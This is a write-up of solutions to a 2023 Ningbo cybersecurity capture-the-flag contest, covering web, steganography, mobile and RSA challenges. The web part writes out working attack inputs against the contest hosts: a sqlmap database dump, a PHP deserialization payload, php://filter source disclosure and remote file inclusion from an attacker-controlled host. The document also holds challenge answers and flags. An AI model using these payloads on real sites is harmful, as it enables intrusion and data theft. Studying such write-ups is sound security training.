2023 Tianyi Yong'an Cup Ningbo Cybersecurity Competition (天一永安杯宁波市网络安全大赛) Writeup
Since the offline finals don't reimburse travel, I just dabbled a bit (definitely not because I couldn't qualify for the finals! 😫)
Web
Query
Query suitable data and get your flag.
POST http://37a6852ac4faf290.node.nsctf.cn/login.php HTTP/1.1
Host: 37a6852ac4faf290.node.nsctf.cn
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://37a6852ac4faf290.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://37a6852ac4faf290.node.nsctf.cn/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8lvsj65t588pem3sqkj1m24md6
Connection: close
username=1&password=*
Just throw sqlmap at it with the saved request:
python .\sqlmap.py -r post.txt -D 'ctf' -T 'f111' --dump
Deserialization
Construct your object
Visiting the challenge and viewing the page source reveals a code snippet: it requires POSTing $read and $input, where $read must not contain f14g.
<!--
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
    die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
    include($read);
    $input = unserialize($input);
    $input2 = clone $input;
    $input2->position = "route.php";
}
else{
    die("NONONO!");
}
-->
NONONO!
Following the known logic, build the payload directly. First use the php://filter pseudo-protocol to read route.php:
read=php://filter/convert.base64-encode/resource=route.php&input=123
which yields the file's source:
<h1>Here can you find the position of the flag!</h1>
<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>
The file also mentions h1nt.php, so read that next:
<?php
class test
{
    public $position;
    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}
?>
The logic is simple; build the object accordingly:
<?php
// Minimal copy of the class so serialize() emits the same structure as h1nt.php's test
class test
{
    public $position;
}
$f = new test();
$f->position = 'f14g.php';
var_dump(serialize($f));
// O:4:"test":1:{s:8:"position";s:8:"f14g.php";}
Because we need the unserialized object to be an instance of test so that the clone triggers __clone, read has to include h1nt.php (which defines the class); the final parameters are:
read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:8:"f14g.php";}
CodeCheck
Check this code!
Viewing the page source gives a partial code snippet:
<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->
NONONO
The logic is simple: the content fetched from a must equal "flag", and the content fetched from b must match c (the check dies otherwise). Remote file inclusion plus the php://filter pseudo-protocol handles it directly:
http://e644ab7e50751e44.node.nsctf.cn/
?a=http://your_ip/1.txt
&b=http://your_ip/1.txt
&c=flag
&d=php://filter/convert.base64-encode/resource=index.php
Base64-decoding the output of d gives the full index.php:
<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->
<?php
$flag = "flag{flag{a3722bcf95f64d05aab15a41a000fdfb}}";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    var_dump($_GET['c']);
    var_dump(file_get_contents($_GET['b']));
    die("yes");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}
?>
Misc
zip
Simple Compress
Opening the attachment, the archive's comment gives a hint:
The art of 0 and 1, and it will remain shorter than 9.
Just script out all candidates and brute-force the archive; the password is 01001101:
import itertools

# The comment says the password uses only 0 and 1 and is shorter than 9
# characters, so emit every binary string of length 1..8 as a wordlist.
digits = ['0', '1']
with open('pass.txt', 'w') as f:
    for length in range(1, 9):
        for combination in itertools.product(digits, repeat=length):
            f.write(''.join(combination) + '\n')
SimpleDocument
More than image.
Carve out the embedded PDF, then select-all and copy to get the flag (the flag text is set to white, so it is invisible by default).
BeautifulImage
Cool Mountain
LSB steganography: bit plane 0 contains a base64 string
ZmxhZ3syNGVkZDc2ZTQ2YzIyYzY1Y2M1YmRkZDNjNmU0ZjZmM30=
Mobile
peacock
peacock
jadx
Stared at it for ages with no idea, then tried decompiling the .so file directly and found it is base64 with a custom alphabet; decoding with that table gives the flag.
Crypto
secret
What a magical ciphertext!
import gmpy2
import libnum

p = 134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q = 147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n = 19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c = 13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e = 28

# e = 28 shares a factor with phi = (p-1)(q-1), so e has no inverse mod phi.
# Strip the common factor t, decrypt with e/t to obtain m^t mod n, then take
# the t-th integer root; this only recovers m when m^t < n.
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)
t1 = e // t
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)  # m^t mod n
print(mt1)
s, exact = gmpy2.iroot(mt1, t)  # exact is True when mt1 is a perfect t-th power
print(s)
print(libnum.n2s(int(s)))
Morse's Notebook
你知道吗。今天我竟然在街上捡到了100元钞票,我当时简直惊呆了,太幸运了。于是我赶紧把钞票捡起来!心里面十分高兴。走了一段路之后,我看见了一个老奶奶在街角卖菜!我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去!把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐!因为我知道。这个世界因为有我们每一个人的善良而变得更美好,今天天气真的很好,我和小丽!小明越好一起去公园玩,在公园里,我们看见了一只可爱的小松鼠,它在树枝上蹦来蹦去!十分活泼可爱。我们还看见了一些漂亮的花朵,它们在微风中轻轻摇曳。像在跳舞一样!我们一边走一边欣赏,一边笑一边玩。真是度过了一个美好的下午。回家的路上!我感到心情特别愉悦。因为我知道。只要心怀善意!天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐!人生路上,有时候你会遇到阻碍。但只要你努力地挑战,不放弃。就能突破困境!实现自己的梦想,所以,不管你遇到什么样的挑战,都不要气馁!坚持下去,你一定会收获成功的喜悦。因为!只有那些坚定自己方向的人,才能走得更远,更自信。当我们遭遇挫折和失败的时候!不要被打倒。要用心去学习,从失败中汲取经验教训。然后重新站起来!更加坚定地追求自己的目标。成功并不是一蹴而就的,需要我们付出长久的努力和坚持!但只要我们一直前进,终究会到达成功的彼岸!所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。
mesr{997a9k414dx8m4061u74v15m1y32201k}
Another guess-the-trick challenge: on inspection only the three symbols , . ! appear in the text, so, combined with the challenge name, convert them to Morse code:
.--. .- ... ... .-- --- .-. -.. .. ... -.-. --- -. --. .-. .- - ...
// PASSWORDISCONGRATS
Vigenère decryption followed by Caesar decryption yields the flag.
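The full decoding chain above as an added example (not part of the original writeup): the punctuation mapping 。 = dot, , = dash, ! = letter gap is assumed from the transcription shown, the Vigenère key is taken as the part after PASSWORDIS, and the Caesar shift is found by trying all 26 and keeping the one that produces a flag{ prefix.

```python
# Added example, not the writeup author's code. Assumed: '。' -> dot, ',' -> dash,
# '!' -> letter gap (both fullwidth and ASCII forms accepted); Vigenere is letters-only.
STORY = "你知道吗。今天我竟然在街上捡到了100元钞票,我当时简直惊呆了,太幸运了。于是我赶紧把钞票捡起来!心里面十分高兴。走了一段路之后,我看见了一个老奶奶在街角卖菜!我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去!把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐!因为我知道。这个世界因为有我们每一个人的善良而变得更美好,今天天气真的很好,我和小丽!小明越好一起去公园玩,在公园里,我们看见了一只可爱的小松鼠,它在树枝上蹦来蹦去!十分活泼可爱。我们还看见了一些漂亮的花朵,它们在微风中轻轻摇曳。像在跳舞一样!我们一边走一边欣赏,一边笑一边玩。真是度过了一个美好的下午。回家的路上!我感到心情特别愉悦。因为我知道。只要心怀善意!天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐!人生路上,有时候你会遇到阻碍。但只要你努力地挑战,不放弃。就能突破困境!实现自己的梦想,所以,不管你遇到什么样的挑战,都不要气馁!坚持下去,你一定会收获成功的喜悦。因为!只有那些坚定自己方向的人,才能走得更远,更自信。当我们遭遇挫折和失败的时候!不要被打倒。要用心去学习,从失败中汲取经验教训。然后重新站起来!更加坚定地追求自己的目标。成功并不是一蹴而就的,需要我们付出长久的努力和坚持!但只要我们一直前进,终究会到达成功的彼岸!所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。"
CIPHER = "mesr{997a9k414dx8m4061u74v15m1y32201k}"  # challenge ciphertext

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
}
# The three carrier symbols; every other character of the story is noise.
SYMBOLS = {"。": ".", ".": ".", ",": "-", ",": "-", "!": " ", "!": " "}


def story_to_morse(text):
    """Keep only the carrier punctuation and translate it to dots, dashes and gaps."""
    return "".join(SYMBOLS[ch] for ch in text if ch in SYMBOLS).strip()


def morse_decode(code):
    return "".join(MORSE[sym] for sym in code.split())


def vigenere_decrypt(ct, key):
    """Letters-only Vigenere: non-letters pass through and do not consume key chars."""
    out, i = [], 0
    for ch in ct:
        if ch.isalpha():
            base = 65 if ch.isupper() else 97
            k = ord(key[i % len(key)].lower()) - 97
            out.append(chr((ord(ch) - base - k) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def solve(story=STORY, cipher=CIPHER):
    """Return (hidden Morse message, flag). A Caesar shift is a one-letter Vigenere key."""
    message = morse_decode(story_to_morse(story))  # PASSWORDISCONGRATS
    key = message.split("PASSWORDIS", 1)[1]         # the Vigenere key that follows
    after_vigenere = vigenere_decrypt(cipher, key)
    for shift in range(26):
        candidate = vigenere_decrypt(after_vigenere, chr(97 + shift))
        if candidate.startswith("flag{"):
            return message, candidate
    raise ValueError("no Caesar shift yields a flag{ prefix")
```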
rsa
What math was used here?
# Run under Sage: PolynomialRing, Zmod and small_roots are Sage APIs
import gmpy2
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439
# Coppersmith: find a small root x of 2*a*x + 1 == 0 modulo a factor of n
R = PolynomialRing(Zmod(n), 'x')
x = R.gen()
f = 2 * a * x + 1
f_monic = f.monic()
ans = f_monic.small_roots(X=2 ** 60, beta=0.4, epsilon=0.05)
g = ans[0]
d = gmpy2.invert(gmpy2.mpz(65537), gmpy2.mpz((a - 1) * (g - 1)))
m = gmpy2.powmod(gmpy2.mpz(c), d, gmpy2.mpz(a * g))
plaintext = bytes.fromhex(hex(int(m))[2:])
print(plaintext)